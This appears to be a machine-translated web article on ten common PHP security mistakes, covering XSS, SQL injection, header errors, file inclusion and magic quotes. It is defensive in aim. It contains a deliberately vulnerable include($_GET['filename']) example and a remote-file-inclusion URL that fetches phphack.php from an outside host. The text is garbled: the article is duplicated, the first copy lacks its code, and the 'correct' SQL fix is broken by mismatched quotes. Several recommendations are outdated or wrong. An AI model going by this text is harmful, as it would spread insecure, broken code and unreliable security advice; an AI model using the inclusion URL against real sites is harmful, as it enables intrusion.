Summary of common mistakes PHP makes when writing secure code
- 2020-03-31 20:50:04
- OfStack
1. Do not switch to HTML entities
A basic rule of thumb: all untrusted input (especially data submitted by the user from the form) should be switched before output.
Echo $_GET [' usename];
This example might output:
< Script> < / script>
This is an obvious security concern unless you ensure that your users are typing correctly.
How to repair:
We need to "< ", ">" ,"and", etc. into the correct HTML representation (< , > ', and "), htmlspecialchars and htmlentities().
The right way:
Echo htmlspecialchars ($_GET [' username '], ENT_QUOTES);
2. Do not divert SQL input
I discussed this in an article (PHP +mysql) and gave a simple way to prevent SQL injection. I've been told that they've set magic_quotes to On in php.ini, so don't worry about it, but not all the inputs are from $_GET, $_POST, or $_COOKIE!
How to repair:
As in the simplest way to prevent SQL injection (PHP +mysql), I recommend using the mysql_real_escape_string() function
Correct approach:
3. Wrong use of http-header-related functions: header(), session_start(), setcookie()
Have you encountered this warning?" Warning: Cannot add header information - headers already sent [...]
Each time a web page is downloaded from the server, the server's output is divided into two parts: the header and the body.
The header contains some non-visual data, such as cookies. The head always arrives first. The body part includes visual HTML, images, and other data.
If output_buffering is set to Off, all http-header-related functions must be called before there is any output. The problem is that while you are developing in one environment, the Settings for output_buffering may be different when deployed to another environment. The result is that the steering stops, cookies and sessions are not set correctly... .
How to repair:
Be sure to call the function associated with the http-header before the output, and let output_buffering = Off
.
Files requiring or include use unsafe data
Again: do not trust data that is not explicitly declared by yourself. Do not Include or require files from $_GET, $_POST, or $_COOKIE.
Such as:
Now as a hacker can now be used: http://www.yourdomain.com/index.php? Filename = anyfile. TXT
To get your confidential information, or to execute a PHP script.
If allow_url_fopen=On, you're dead:
Try this input:
http://www.yourdomain.com/index.php? Filename=http%3A%2F%2Fdomain.com % 2 fphphack. PHP
Now your web page contains the output of http://www.youaredoomed.com/phphack.php. Hackers can send spam, change password, delete files, etc. As long as you can imagine.
How to repair:
You must control which files can be included in the include or require directive.
Here's a quick but incomplete solution:
5. Grammatical errors
Grammatical errors include all lexical and grammatical errors and are so common that I have to list them here. The solution is to study the syntax of PHP and be careful not to miss any parentheses, braces, semicolons, or quotes. Also change a good editor, do not use notepad!
6. Little or no object orientation
Many projects don't use PHP's object-oriented techniques, and as a result, the maintenance of the code can be very time consuming. PHP supports more and more object-oriented technologies and is getting better and better, and there is no reason not to use object-oriented technologies.
7. Not using the framework
95% of PHP projects do the same four things: Create, edit, list and delete.
8. Not knowing what PHP already has
PHP has many features at its core. Many programmers have repeatedly invented the wheel. A lot of time was wasted. Search PHP mamual before coding, Google it, and you may find something new! Exec () in PHP is a powerful function that executes the CMD shell and returns the last line of the result as a string. Considering that safety can be used EscapeShellCmd()
9. Use older versions of PHP
Many programmers still use PHP4. Developing PHP on PHP4 does not fully utilize PHP's potential, and there are some security concerns. Let's go to PHP5. It doesn't take much work. Most PHP4 programs can be migrated to PHP5 with few or no changes to their statements. According to http://www.nexen.net, only 12% of PHP servers use PHP5, so 88% of PHP developers still use PHP4.
10. Change the meaning of quotation marks twice
Ever see \' or \' appear on a web page? This is usually because magic_quotes is set to off in the developer's environment, and on the deployed server magic_quotes = on.php repeats addslashes() on the data in GET, POST, and cookies.
Original text:
It 's a string
Magic quotes on:
It \ 's a string
Run it again
The addslashes () :
It \ \ 's a string
The HTML output:
It \ 's a string
There is also a case that the user initially entered the wrong login information, the server detected the wrong input, output the same form requires the user to enter again, resulting in the user's input twice!
A basic rule of thumb: all untrusted input (especially data submitted by the user from the form) should be switched before output.
Echo $_GET [' usename];
This example might output:
< Script> < / script>
This is an obvious security concern unless you ensure that your users are typing correctly.
How to repair:
We need to "< ", ">" ,"and", etc. into the correct HTML representation (< , > ', and "), htmlspecialchars and htmlentities().
The right way:
Echo htmlspecialchars ($_GET [' username '], ENT_QUOTES);
2. Do not divert SQL input
I discussed this in an article (PHP +mysql) and gave a simple way to prevent SQL injection. I've been told that they've set magic_quotes to On in php.ini, so don't worry about it, but not all the inputs are from $_GET, $_POST, or $_COOKIE!
How to repair:
As in the simplest way to prevent SQL injection (PHP +mysql), I recommend using the mysql_real_escape_string() function
Correct approach:
<?php
$sql = "UPDATE users SET
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>
3. Wrong use of http-header-related functions: header(), session_start(), setcookie()
Have you encountered this warning?" Warning: Cannot add header information - headers already sent [...]
Each time a web page is downloaded from the server, the server's output is divided into two parts: the header and the body.
The header contains some non-visual data, such as cookies. The head always arrives first. The body part includes visual HTML, images, and other data.
If output_buffering is set to Off, all http-header-related functions must be called before there is any output. The problem is that while you are developing in one environment, the Settings for output_buffering may be different when deployed to another environment. The result is that the steering stops, cookies and sessions are not set correctly... .
How to repair:
Be sure to call the function associated with the http-header before the output, and let output_buffering = Off
.
Files requiring or include use unsafe data
Again: do not trust data that is not explicitly declared by yourself. Do not Include or require files from $_GET, $_POST, or $_COOKIE.
Such as:
index.php
<?
//including header, config, database connection, etc
include($_GET['filename']);
//including footer
?>
Now as a hacker can now be used: http://www.yourdomain.com/index.php? Filename = anyfile. TXT
To get your confidential information, or to execute a PHP script.
If allow_url_fopen=On, you're dead:
Try this input:
http://www.yourdomain.com/index.php? Filename=http%3A%2F%2Fdomain.com % 2 fphphack. PHP
Now your web page contains the output of http://www.youaredoomed.com/phphack.php. Hackers can send spam, change password, delete files, etc. As long as you can imagine.
How to repair:
You must control which files can be included in the include or require directive.
Here's a quick but incomplete solution:
<?
//Include only files that are allowed.
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['filename']);
}
else{
exit('not allowed');
}
?>
5. Grammatical errors
Grammatical errors include all lexical and grammatical errors and are so common that I have to list them here. The solution is to study the syntax of PHP and be careful not to miss any parentheses, braces, semicolons, or quotes. Also change a good editor, do not use notepad!
6. Little or no object orientation
Many projects don't use PHP's object-oriented techniques, and as a result, the maintenance of the code can be very time consuming. PHP supports more and more object-oriented technologies and is getting better and better, and there is no reason not to use object-oriented technologies.
7. Not using the framework
95% of PHP projects do the same four things: Create, edit, list and delete.
8. Not knowing what PHP already has
PHP has many features at its core. Many programmers have repeatedly invented the wheel. A lot of time was wasted. Search PHP mamual before coding, Google it, and you may find something new! Exec () in PHP is a powerful function that executes the CMD shell and returns the last line of the result as a string. Considering that safety can be used EscapeShellCmd()
9. Use older versions of PHP
Many programmers still use PHP4. Developing PHP on PHP4 does not fully utilize PHP's potential, and there are some security concerns. Let's go to PHP5. It doesn't take much work. Most PHP4 programs can be migrated to PHP5 with few or no changes to their statements. According to http://www.nexen.net, only 12% of PHP servers use PHP5, so 88% of PHP developers still use PHP4.
10. Change the meaning of quotation marks twice
Ever see \' or \' appear on a web page? This is usually because magic_quotes is set to off in the developer's environment, and on the deployed server magic_quotes = on.php repeats addslashes() on the data in GET, POST, and cookies.
Original text:
It 's a string
Magic quotes on:
It \ 's a string
Run it again
The addslashes () :
It \ \ 's a string
The HTML output:
It \ 's a string
There is also a case that the user initially entered the wrong login information, the server detected the wrong input, output the same form requires the user to enter again, resulting in the user's input twice!